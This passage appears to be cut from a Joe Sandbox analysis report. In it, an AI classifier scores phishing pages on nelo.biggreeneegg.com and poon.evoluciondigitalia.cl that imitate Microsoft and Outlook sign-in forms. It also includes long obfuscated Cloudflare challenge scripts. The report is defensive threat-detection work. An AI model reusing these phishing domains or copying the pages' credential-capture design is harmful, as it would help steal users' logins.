t.runWhen||!1!==t.runWhen(e))&&(o=o&&t.synchronous,n.unshift(t.fulfilled,t.rejected))});var s=[];if(this.interceptors.response.forEac |
| URL: https://nelo.biggreeneegg.com/... Model: Joe Sandbox AI | {
"risk_score": 6,
"reasoning": "The script appears to be a Cloudflare security script, which is a legitimate service. However, it uses some behaviors that raise moderate concerns, such as external data transmission and the use of obfuscated code. Further review may be necessary to ensure there are no malicious activities hidden within the script."
} |
(function(){window._cf_chl_opt={cvId: '3',cZone: "nelo.biggreeneegg.com",cType: 'managed',cRay: '8fdcf24eae2a728d',cH: 'Wr3AXZX5aDdR8DPAlLofYUN38Fwb_XVEj.TstmP1ukA-1736179494-1.2.1.1-sJ41sgGndcsdtMDWCtTKt3xjc9ClPeYwkcQvcm9_tOHdk6cSIueOMX13C_iB1Nxl',cUPMDTk: "\/?__cf_chl_tk=6X9oO9oO8_7PDu5YucUJyQkhJQO8Jx3AbH3t.msTp_s-1736179494-1.0.1.1-gGBl1AyqsFt1DG9IHowPjEErBcmKrlwgJN0He0MhXBE",cFPWv: 'g',cITimeS: '1736179494',cTTimeMs: '1000',cMTimeMs: '390000',cTplC: 0,cTplV: 5,cTplB: 'cf',cK: "",fa: "\/?__cf_chl_f_tk=6X9oO9oO8_7PDu5YucUJyQkhJQO8Jx3AbH3t.msTp_s-1736179494-1.0.1.1-gGBl1AyqsFt1DG9IHowPjEErBcmKrlwgJN0He0MhXBE",md: "g3RwVqQ2gdQ3N5M5X0043g1ZkFEVM1eORSaruNm57Cw-1736179494-1.2.1.1-NXZX.ZC6pSeNjqyz9uy.ionr0b6BDXxhGiVvUqruXcJbLbwQ21a9UdGf5aZvY1VZb_OzGfAhqLPfeB3v2f1F6j__TP9cgLRj4RhtysnodRGDJy92AVSYRMeV8zU8TkhzhIOX.DqAU6SN_Kgk8mkH8X8Pnf_ESeVDm.53NkJg_jOrH.T9.zoz.7yzgobyWx8nI6IrnmpDNldvNaNDTb7GvJ6Ps31WvitcsIWakG3ia3hvLJ8jwJUj5h_1n2uSmu9JuOz_JfU.zj7Jk5a2yGVgd3gbG_I78cDtvFP0hoyP55DPNOgYS3IZK19q6WjZnrVh1SCt4Go1F5jtjpmoy8TOGN0vzvSEgEWz6Qr5zE5EM0LZcZ8SxdP2u4yIs4KFhl77sFBYAQUEjGiQc0MWtYVmTtVpejRcp32O90p.N83SqCEJujG2MzwAiT0w8FtYu4n8S7J3My7WeVPJRzGC274M4o.QO7eyNPI4vu3__V1UaMIYJ81Mgi.uZas_namagKgpFu7eqSXsIIYPxfXqKUu8T8FkvJVKVICowUhJ8d1ucEiFXcBoS7SIYdR61ZgtBV1rJdC8KaWjOyDvc2wwx1aUCbkd6bsbnOfgxJgkgz0rHJMiRc2Wv11BGotcSX0ZDdClrEGAcPMx7FcB9RxjLJfg23pV9mrKByekYOjWjf3OVJkTV.G87gGdBDgSq.AK3N5hW6JSzbSOJY2r2NR_V17WHHNkDg0sQ6sps2ps9.IlkaRSUrmzFu6WndpL.sunxB2FJWPC9ImIuiSmTEood7KNJw4FKOMXg0sFkYXGXDdf47ovYoqt9gW3sTnG4fv0x3bBynnemfqOyLwIte1nDiX6RHx8MQxV5DgczkrspoqQAbHq9TdcZ6gs_OJL3moLpe8HucmLiXPBvAi2k2RZvJHbgJvjxh7hMHwpuQA2M5YRA0b.bYxldT2iAHxwiG6MQKx9.uDbrut1WBQ12.uy80piWrnSSkQDqahgfISKfZPBMOkt3UPyvSeSU4f.Yt9C385gi_YUz9ARe5HBx1MlLIAdk0GDM5KCH1_yB3X0wB16xwwHkevxNVyGgIytZ87khIx4ya5PZP18Y.3Q6lVh289t0w2uMU0SyOxT8nhS_mCQdWtuZNXh5I58lPFCIwUOxG9nMV..g1dMto0PD7RAj2sfAsm4..ASqkZc5mRtNH.QwOgj3ZlDOshE9Q2zBe6krXfG_54qQWiaxdvr5Xc12sd3gLzWL1U56XwbmbMMZErdYfWIHO6NUxceQNg5N7wSmXRSi0K0ci0KbIiM0ElU1W3uBsq9ooqYpZNoG0JNDK7qCibru3TPad5cuhkuuThtIGeQMVBWVv_HDZ411RkiMI4db1Eq4SiTBJBTCf6mT32WSBur.Cs_V8fZ5DnE9U2LNj_yCcDjpqKsvmF50RpYGszRwqosOIXl5eE4Z8W2gGIzM8OdsetAFb0BieHJfsif2j8DpRad0NRFbTySKgE5G3tVl8n1Y6VXF9K76Qdl2Q3nn9rLHydFh.OMZJOUhonhL9AlTUhuI67E7ISgwWZVWS3TS7_v.i.mdSxMmpv8rDSlfn5do0uJdylL11L6m9O.TA4UWlk95OU.3Mk__fOp1Spf8aeAPp74nwPXTB7njnfZk23JrPavFjofuuQEV0TwZe5auzVlTRJbui9IDUMvLRyn8AJMXGXwzjoxrVxUvbLv5Bt2dMCOS_rlOnvzm57fXTSRlvNTPifo3tus9yGKzzzDUYWyOc.nnvsO4E4X5YqIT6pMrbQAvoVKQntLLeAdWu9N0Sps7N0Psht3W2ozMcXLZg.Fk8tif1xM5BoA8ipzDKipE26BuTL51aTdrwWA2rKSkxJGpnGIoRNQwZFUDi0NrYHCEqtiPsJfJEKawCsG3d8ixfdS_cImjsLoqx8UXH1RfmyiJXkAhy813BdwJfiXR1on90gfQVj5Rn15GQLZkC2s395qVghMux1nt5Wf7sNHnhajXTm3nF0MUUZIT.6Aty_a1ITjHUFT2odPNaX__OllLnmjM2J7b32mppGgM7Y6TQtka6tDZPa8SQrPUm9d8tBDeyfXW07phG4zmvrpY_XYZ2LgZa4SyiYte_c071fQfc2ixlbtclfKIk65cnG5KDCleBE0uvgIZ7Axc.13RN3lj1vP3PSRlxcbVPD1.GfaG9townxyll2gG_V2vlad8BKPxuDYkUtvZJrWqLJbnYqsS.PEZpDJbRGYAHdG_DKm_y_3EEuQg4YVPdMlTnjTdQGWrWz2p4zoqThPYcVKTMHtku0Il.FajCsSLZYBxmtO30L_GDnhACwX4d4Pkyz0ybzyGKRaYiXtLALSmBg1t9MSMWVi45LYCug16f22dm8wyzkLTiWMduW3vq_J5mDou8NU5vNZ8p_9XIs__6TGQHFignxZyTztJCbRU_jGYeYT9X9RrCttgttuQOQdUHGPMwMSvOrk7lCdp96vNFg27QS87JZs2UcXaq.riW66EpqzwF5d_bwpQVb4tLeLZsqRHpPzcV4Hdwuo7OiVzp0OFGETLJd0pi8KId8YjTNpTR6GsXFrdsRKsNm_sYjclkOOHQ",mdrd: "DJkIPNuHs6JWlq_3FJdcXJE9IldIRYHsQ0CqryD9y9c-1736179494-1.2.1.1-H5SybK3yrnFlRPc2sIgB7PqeUWLyMHs4npsdTrfxRRS5590lqb7197lFDJ4O3z5.lvOqY5tmMSb1MxOSzKbvax7hxEHoPjQCe7IAtSEfsHTE1scOC42.BDlZFNilSYFh8x6P3tL3AXl8VA1KFi7bYjUoneQuncexjBSA3LhOwRLdiaVZT3rkWIN_VueRgpYWKBkXQpAZzinVJI1IItUtvKJcMkQQukYinTU5xT_b2HW20x31l8Wh6JRk.6ycxsjcZdbRtPbG5dHDaOPw6EQ2L0lFjXLospSWDOK5xtlNFSiB8f3Ft7S_NI6hRAWgZL_Y2R6RVlWE_uSMIR23_FllP1_urszD0IbFim8hnShr1Lz0.T5mHu2iCSmn0RTkw37uIuXvQebcd.TIFRpw5HX49T4OWp0W4jk6KbpFioXUxoP5kXRF_0SD3.oxNx_rxvb7TjBt7G4pQf3j8pNlX.UrCORgOtjKxjIMwo2suDhafVspB0mulJBN_ancIp97kZ9c3XzQ0pQnABpkXnBs5qTycAkaB_6rGq1l2yVV1DdxoIfH.dnT2SNsl3ZjNUz5ZTsw81d1daCfoexIDa9ZJztLPszaT1kj_.JJNO8tmHnT9c5T10glOLwpPGiklt_br__X_oxqobvgzNwJghm3QREMbJon |
| URL: https://poon.evoluciondigitalia.cl/? Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Verify email to proceed",
"prominent_button_name": "Next",
"text_input_field_labels": [
"admin"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://poon.evoluciondigitalia.cl/? Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Validate email password to continue",
"prominent_button_name": "Validate",
"text_input_field_labels": [
"Password"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://poon.evoluciondigitalia.cl/? Model: Joe Sandbox AI | {
"brands": [
"Outlook"
]
} |
|
| URL: https://poon.evoluciondigitalia.cl/? Model: Joe Sandbox AI | {
"brands": [
"Microsoft",
"Outlook"
]
} |
|
| URL: https://poon.evoluciondigitalia.cl/? Model: Joe Sandbox AI | ```json{ "legit_domain": "outlook.com", "classification": "wellknown", "reasons": [ "The brand 'Outlook' is well-known and is associated with the domain 'outlook.com'.", "The URL 'poon.evoluciondigitalia.cl' does not match the legitimate domain for Outlook.", "The domain 'evoluciondigitalia.cl' is unrelated to Outlook, which raises suspicion.", "The presence of a password input field on a non-legitimate domain is a common phishing tactic.", "The use of a subdomain 'poon' and the main domain 'evoluciondigitalia.cl' does not align with any known Outlook services." ], "riskscore": 9}
Google indexed: False |
URL: poon.evoluciondigitalia.cl
Brands: Outlook
Input Fields: Password |
| URL: https://poon.evoluciondigitalia.cl/? Model: Joe Sandbox AI | ```json{ "legit_domain": "microsoft.com", "classification": "wellknown", "reasons": [ "The brand 'Microsoft' is a well-known global technology company.", "The legitimate domain for Microsoft is 'microsoft.com'.", "The provided URL 'poon.evoluciondigitalia.cl' does not match the legitimate domain for Microsoft.", "The URL contains no direct association with Microsoft, which is suspicious.", "The domain 'evoluciondigitalia.cl' does not appear to be related to Microsoft.", "The presence of an 'admin' input field could indicate an attempt to capture sensitive information." ], "riskscore": 9}
Google indexed: False |
URL: poon.evoluciondigitalia.cl
Brands: Microsoft
Input Fields: admin |
| URL: https://challenges.cloudflare.com/cdn-cgi/challeng... Model: Joe Sandbox AI | {
"risk_score": 1,
"reasoning": "The provided JavaScript snippet appears to be a Cloudflare challenge script, which is a common security mechanism used to protect websites from bots and other automated threats. The script does not contain any high-risk indicators, such as dynamic code execution, data exfiltration, or redirects to malicious domains. The script is primarily responsible for handling the Cloudflare challenge and providing translations for the challenge interface. This behavior is consistent with the expected functionality of a Cloudflare challenge script, and there are no clear signs of malicious intent. Therefore, the risk score is assessed as low (1)."
} |
window._cf_chl_opt.uaO=false;window._cf_chl_opt.qqQL2={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F"},"translations":{"testing_only_always_pass":"Testing%20only%2C%20always%20pass.","turnstile_footer_privacy":"Privacy","turnstile_iframe_alt":"Widget%20containing%20a%20Cloudflare%20security%20challenge","invalid_sitekey":"Invalid%20sitekey.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","human_button_text":"Verify%20you%20are%20human","check_delays":"Verification%20is%20taking%20longer%20than%20expected.%20Check%20your%20Internet%20connection%20and%20%3Ca%20class%3D%22refresh_link%22%3Erefresh%20the%20page%3C%2Fa%3E%20if%20the%20issue%20persists.","not_embedded":"This%20challenge%20must%20be%20embedded%20into%20a%20parent%20page.","turnstile_expired":"Expired","invalid_domain":"Invalid%20domain.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","turnstile_feedback_report":"Having%20trouble%3F","turnstile_failure":"Error","turnstile_refresh":"Refresh","testing_only":"Testing%20only.","turnstile_timeout":"Timed%20out","turnstile_feedback_description":"Send%20Feedback","outdated_browser":"Your%20browser%20is%20out%20of%20date.%20Update%20your%20browser%20to%20view%20this%20site%20properly.%3Cbr%2F%3E%3Ca%20target%3D%22_blank%22%20rel%3D%22noopener%20noreferrer%22%20href%3D%22https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support%22%3EClick%20here%20for%20more%20information%3C%2Fa%3E","turnstile_success":"Success%21","time_check_cached_warning":"Your%20device%20clock%20is%20set%20to%20a%20wrong%20time%20or%20this%20challenge%20page%20was%20accidentally%20cached%20by%20an%20intermediary%20and%20is%20no%20longer%20available","turnstile_overrun_description":"Stuck%20here%3F","turnstile_footer_terms":"Terms","feedback_report_output_subtitle":"Your%20feedback%20report%20has%20been%20successfully%20submitted","turnstile_verifying":"Verifying..."},"polyfills":{"feedback_report_output_subtitle":false},"rtl":false,"lang":"en-us"};~function(gJ,eM,eN,eO,eV,f4,f5,fx,fA,fC,fD,fE,fQ,g2,g8,g9,ga,gk,gv,gz,gA,gB,gF,gG,gH,f2,f3){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=-parseInt(gI(740))/1*(parseInt(gI(645))/2)+-parseInt(gI(999))/3*(-parseInt(gI(954))/4)+-parseInt(gI(1696))/5*(parseInt(gI(1485))/6)+parseInt(gI(761))/7*(parseInt(gI(689))/8)+-parseInt(gI(1792))/9*(-parseInt(gI(1091))/10)+-parseInt(gI(940))/11+-parseInt(gI(455))/12*(-parseInt(gI(697))/13),f===d)break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,552716),eM=this||self,eN=eM[gJ(428)],eO=function(c,gK,f,g,h,i,j,k){for(gK=gJ,f={'onDqg':function(l,m){return l+m},'vOlhF':function(l,m){return l+m},'aDGAR':function(l,m){return l(m)},'bbCIL':function(l,m){return l-m},'jaAOj':function(l,m){return l&m},'GYeOF':function(l,m){return l%m}},k,h=32,j=f[gK(629)](f[gK(1724)](eM[gK(1774)][gK(1693)],'_'),0),j=j[gK(1475)](/./g,function(l,m,gL){gL=gK,h^=j[gL(667)](m)}),c=eM[gK(1385)](c),i=[],g=-1;!f[gK(1652)](isNaN,k=c[gK(667)](++g));i[gK(612)](String[gK(1078)](f[gK(1724)](f[gK(950)](f[gK(518)](k,255),h)-f[gK(668)](g,65535),65535)%255)));return i[gK(1585)]('')},eM[gJ(636)]=![],eM[gJ(1785)]=function(h3){if(h3=gJ,eM[h3(636)])return;eM[h3(636)]=!![]},eV=0,eN[gJ(1252)]===gJ(908)?eN[gJ(1564)](gJ(1781),function(){setTimeout(eY,0)}):setTimeout(eY,0),eM[gJ(424)]=function(e,hm,g,h){h=(hm=gJ,g={},g[hm(1113)]=hm(997),g[hm(472)]=hm(1306),g[hm(1535)]=hm(805),g[hm(1815)]=hm(1816),g);try{if(h[hm(1815)]===hm(947))e[h[hm(1113)]][hm(1085)]({'source':h[hm(472)],'widgetId':e[hm(1774)][hm(1497)],'event':h[hm(1535)]},'*');else return f1(e)}catch(j){return eZ(f0(e))}},f2=[],f3=0;256>f3;f2[f3]=String[gJ(1078)](f3),f3++) |
| URL: https://challenges.cloudflare.com/cdn-cgi/challeng... Model: Joe Sandbox AI | {
"risk_score": 3,
"reasoning": "The provided JavaScript snippet appears to be a Cloudflare challenge script, which is a legitimate and common practice for web security. The script sets up various configuration options for the Cloudflare challenge and includes functionality to handle communication between the parent window and the challenge widget. While the script uses some techniques like message passing and dynamic code execution, these are common in the context of Cloudflare challenges and do not indicate malicious intent. The overall behavior of the script is consistent with its purpose of implementing a Cloudflare challenge, so the risk score is relatively low."
} |
(function(){
window._cf_chl_opt={
cvId: '3',
cZone: 'challenges.cloudflare.com',
cTplV: 5,
chlApivId: '0',
chlApiWidgetId: '5wrtq',
chlApiSitekey: '0x4AAAAAAADnPIDROrmt1Wwj',
chlApiMode: 'managed',
chlApiSize: 'normal',
chlApiRcV: 'nAgF1sq8hcVYf9PLmThHb8AG7WjyuS_Keqfp0vnN.Ps-1736179497-1.3.1.1-IcFOUhujDUFLVUAaZchqkUyienspVlJcqQAJwDqBFN8',
chlApiTimeoutEncountered: 0,
chlApiOverrunBudgetMs:10000,
chlTimeoutMs:120000,
cK:[],
cType: 'chl_api_m',
cRay: '8fdcf26428b9f78d',
cH: 'OZtkKTY.1mh7TWgQEovqV7SILwJd.vkhkh2b9EHRILc-1736179497-1.1.1.1-ntAda_CAf86g0jStXy4Wkn7awy03Cin1MBHzs1KO1wOw70TU1qoZVCb_.GDMi8OV',
cFPWv: 'g',
cLt: 'n',
chlApiFailureFeedbackEnabled:true,
chlApiLoopFeedbackEnabled:false,
wOL:false,
wT: 'light',
wS: 'normal',
md: 'mUHCMz5Oi7n0bHoXqj4nBO.LLdS5SHdDWO9DrRmOjWA-1736179497-1.1.1.1-7ttLPJG1kXNf2MdYXl2l37zO.fc2qWrTW4ixMuFqk042U65ZOFi5Qxg.eBcQ0BRkT_0hZ.HzGHqVfh.dOeKLFwI6OzsdBX3pvERPoGL0Ig0kUes0js4WqumpDXliNdPGsA25RfKMMAoYHcbigt35JweomaYYskMwyX_srDw8lA4X0.Uu.woVaZnH9x627whHeo5jetsBBa3pWdSuWsuHZ.xPiae0GSqKil0PVLQom95hANLAXPUo3G.4egvHkBZz55RiZilDnvigDws6FjbdjCkNfyIi.p9jvEaaR9rGwhldPQLT1thbUaosoyopl0PTuFa5pHQEVjR5WScnr0oZP6GkdqBQIuafnewtxSXVQzFGN4C5mC6OGdlA7LbagP7nQppXNomjQ8YARW_HbhNFr9mhD5aMKk1hrIi7j0C7e8.am1Ngp299kFddWRgnjQVNIpF1sgTUvVxZiKd5I72ctuCWd6X24Ny.WNW1PxBVrb43FASjs3jnScWAdVY0IsTKcNDi3V.rxhB706ygzCGupwaOjNoYhNgYa8qaKDhdZoRXX4ogQPFFJPwuKuolETw3uk09_I1LpzLKu1sxQ3ioJx5X4Wa2Tt2WWRTIyLRQulg1PShoguja5fLlqsfl5ndmrpvMPvUTYLedmdxTOcsbkITCIVydp4upA_QaLgnCCJ53wUsruyGFt.TtcZEFJ0p2NLaXU2XgscNvKyY65qoes43uOj.NlDgys4rZI9VwwCcrp7k_uh1DV6yN9wsSPQWWSg5.pgShVrcsXoSdYRysn9mOH11uEBBga3cS7QBHVAtTyZmp3suc_V3Olw8MsOvUgdhR88_I_RerDRhe95BEiOVIKXYz7f_6G.RIU.4CAZAv37QN2lBTHgmuO6zW7fQBqZHnpGFbl4yRzrYjeXEORszhjvHfdKq4NoR6H2cbRTPvoJcJ2ynoCY2MIY6Lc_Ra5_AoZcyv_bSgVrWr_HWNEj9gIajqKHpjD75myuFegWkgTfuTCVEz61fctehRlnyEgEUDcT3sXTaPJbythRpyAf7oleTuiP6iRTndF7xsJUqcOb_VAn6qLCt6XA9OsJfY8xVNLPmB3OEEbZiD3vdXbyTCrTDMl_v_To46uKBZbFIp63iLNJiHvmaAvgB1fYrucvDu.z7M4YX13zC2DboBjYn66jpeY4x6X4Bs6uBe99zZ0CtyhvQABsN7GDE8HJdHVKNZGYF1uGh6kRxDEbXCEw1OPckyMb4tC_10dywM1R5w8CMLodFDaCE1_6ol8VpTeYRgF15XnfvtjjaWFF0dhkolVaYHnweQZ9gKe4zujxlHn964cHc5XdmRr2zPyHmLKsxz_7o0yZn_6kGnB2NAl.Z6hBv8PZZO8a02QsuNAoI',
cITimeS: '1736179497',
refresh: function(){
if(window['parent']){
window['parent'].postMessage({
source: 'cloudflare-challenge',
widgetId: '5wrtq',
nextRcV: 'nAgF1sq8hcVYf9PLmThHb8AG7WjyuS_Keqfp0vnN.Ps-1736179497-1.3.1.1-IcFOUhujDUFLVUAaZchqkUyienspVlJcqQAJwDqBFN8',
event: 'reloadRequest',
}, "*");
}
}
};
var handler = function(event) {
var e = event.data;
if (e.source && e.source === 'cloudflare-challenge' && e.event === 'meow' && e.widgetId === window._cf_chl_opt.chlApiWidgetId) {
if(window['parent']){
window['parent'].postMessage({
source: 'cloudflare-challenge',
widgetId: window._cf_chl_opt.chlApiWidgetId,
event: 'food',
seq: e.seq,
}, '*');
}
}
}
window.addEventListener('message', handler);
}());
|
| URL: https://nelo.biggreeneegg.com/ Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": true,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://nelo.biggreeneegg.com Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": true,
"third_party_hosting": true
} |
URL: https://nelo.biggreeneegg.com |
| URL: https://nelo.biggreeneegg.com/ Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": true,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://nelo.biggreeneegg.com/ Model: Joe Sandbox AI | {
"brands": "unknown"
} |
|
| URL: https://nelo.biggreeneegg.com/ Model: Joe Sandbox AI | {
"brands": [
"Cloudflare"
]
} |
|
| URL: https://challenges.cloudflare.com/turnstile/v0/g/8... Model: Joe Sandbox AI | ```json
{
"risk_score": 1,
"reasoning": "The script contains no high-risk or moderate-risk indicators. It appears to be a utility script with functions for handling promises, object manipulation, and error handling. There is no evidence of dynamic code execution, data exfiltration, or interaction with external domains. The code is not obfuscated and does not exhibit aggressive DOM manipulation or legacy practices."
} |
"use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Wt(u,o,c,g,h,"next",l)}function h(l){Wt(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=null?r:{},Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):Ar(Object(r)).forEach(function(n){Object.defineProperty(e,n,Object.getOwnPropertyDescriptor(r,n))}),e}function Bt(e){if(Array.isArray(e))return e}function jt(e,r){var n=e==null?null:typeof Symbol!="undefined"&&e[Symbol.iterator]||e["@@iterator"];if(n!=null){var o=[],c=!0,u=!1,g,h;try{for(n=n.call(e);!(c=(g=n.next()).done)&&(o.push(g.value),!(r&&o.length===r));c=!0);}catch(l){u=!0,h=l}finally{try{!c&&n.return!=null&&n.return()}finally{if(u)throw h}}return o}}function qt(){throw new TypeError("Invalid attempt to destructure non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")}function at(e,r){(r==null||r>e.length)&&(r=e.length);for(var n=0,o=new Array(r);n<r;n++)o[n]=e[n];return o}function zt(e,r){if(e){if(typeof e=="string")return at(e,r);var n=Object.prototype.toString.call(e).slice(8,-1);if(n==="Object"&&e.constructor&&(n=e.constructor.name),n==="Map"||n==="Set")return Array.from(n);if(n==="Arguments"||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(n))return at(e,r)}}function Ae(e,r){return Bt(e)||jt(e,r)||zt(e,r)||qt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0]&1)throw u[1];return u[1]},trys:[],ops:[]},o,c,u,g;return g={next:h(0),throw:h(1),return:h(2)},typeof Symbol=="function"&&(g[Symbol.iterator]=function(){return this}),g;function h(p){return function(E){return l([p,E])}}function l(p){if(o)throw new TypeError("Generator is already executing.");for(;g&&(g=0,p[0]&&(n=0)),n;)try{if(o=1,c&&(u=p[0]&2?c.return:p[0]?c.throw||((u=c.return)&&u.call(c),0):c.next)&&!(u=u.call(c,p[1])).done)return u;switch(c=0,u&&(p=[p[0]&2,u.value]),p[0]){case 0:case 1:u=p;break;case 4:return n.label++,{value:p[1],done:!1};case 5:n.label++,c=p[1],p=[0];continue;case 7:p=n.ops.pop(),n.trys.pop();continue;default:if(u=n.trys,!(u=u.length>0&&u[u.length-1])&&(p[0]===6||p[0]===2)){n=0;continue}if(p[0]===3&&(!u||p[1]>u[0]&&p[1]<u[3])){n.label=p[1];break}if(p[0]===6&&n.label<u[1]){n.label=u[1],u=p;break}if(u&&n.label<u[2]){n.label=u[2],n.ops.push(p);break}u[2]&&n.ops.pop(),n.trys.pop();continue}p=r.call(e,n)}catch(E){p=[6,E],c=0}finally{o=u=0}if(p[0]&5)throw p[1];return{value:p[0]?p[1]:void 0,done:!0}}}var Gt={code:200500,internalRepr:"iframe_load_err",public:!0,retryable:!1,description:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Xt=300020;var De=300030;var Ve=300031;var j;(function(e){e.MANAGED="managed",e.NON_INTERACTIVE="non-interactive",e.INVISIBLE="invisible"})(j||(j={}));var L;(fun |
| URL: https://nelo.biggreeneegg.com/?sso_reload=true Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Sign in",
"prominent_button_name": "Next",
"text_input_field_labels": [
"Email, phone, or Skype"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://nelo.biggreeneegg.com/?sso_reload=true Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Sign in",
"prominent_button_name": "Next",
"text_input_field_labels": [
"admin@"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://nelo.biggreeneegg.com/?sso_reload=true Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Sign in",
"prominent_button_name": "Next",
"text_input_field_labels": [
"admin@to"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://nelo.biggreeneegg.com/?sso_reload=true Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
| URL: https://nelo.biggreeneegg.com/?sso_reload=true Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
| URL: https://nelo.biggreeneegg.com/?sso_reload=true Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
| URL: https://nelo.biggreeneegg.com/?sso_reload=true Model: Joe Sandbox AI | ```json{ "legit_domain": "microsoft.com", "classification": "wellknown", "reasons": [ "The brand 'Microsoft' is well-known and typically associated with the domain 'microsoft.com'.", "The URL 'nelo.biggreeneegg.com' does not match the legitimate domain for Microsoft.", "The domain 'biggreeneegg.com' is unrelated to Microsoft and suggests a different brand or service.", "The presence of input fields for 'Email, phone, or Skype' is typical for Microsoft services, but the domain mismatch is a strong phishing indicator.", "The use of a subdomain 'nelo' and an unrelated primary domain increases suspicion." ], "riskscore": 9}
Google indexed: False |
URL: nelo.biggreeneegg.com
Brands: Microsoft
Input Fields: Email, phone, or Skype |
| URL: https://nelo.biggreeneegg.com/?sso_reload=true Model: Joe Sandbox AI | ```json{ "legit_domain": "microsoft.com", "classification": "wellknown", "reasons": [ "The brand 'Microsoft' is well-known and typically associated with the domain 'microsoft.com'.", "The URL 'nelo.biggreeneegg.com' does not match the legitimate domain for Microsoft.", "The domain 'biggreeneegg.com' is unrelated to Microsoft, which is suspicious.", "The presence of an input field with 'admin@' suggests a potential attempt to collect sensitive information.", "The URL structure includes an unrelated domain, which is a common phishing tactic." ], "riskscore": 9}
Google indexed: False |
URL: nelo.biggreeneegg.com
Brands: Microsoft
Input Fields: admin@ |
| URL: https://nelo.biggreeneegg.com/?sso_reload=true Model: Joe Sandbox AI | ```json{ "legit_domain": "microsoft.com", "classification": "wellknown", "reasons": [ "The brand 'Microsoft' is well-known and typically associated with the domain 'microsoft.com'.", "The URL 'nelo.biggreeneegg.com' does not match the legitimate domain for Microsoft.", "The domain 'biggreeneegg.com' is unrelated to Microsoft and suggests a different brand or service.", "The presence of 'nelo' as a subdomain does not align with Microsoft's typical domain structure.", "The URL structure and domain name do not indicate any association with Microsoft, suggesting a potential phishing attempt." ], "riskscore": 9}
Google indexed: False |
URL: nelo.biggreeneegg.com
Brands: Microsoft
Input Fields: admin@to |
| URL: https://cotauth.toronto.ca/my.policy Model: Joe Sandbox AI | {
"contains_trigger_text": true,
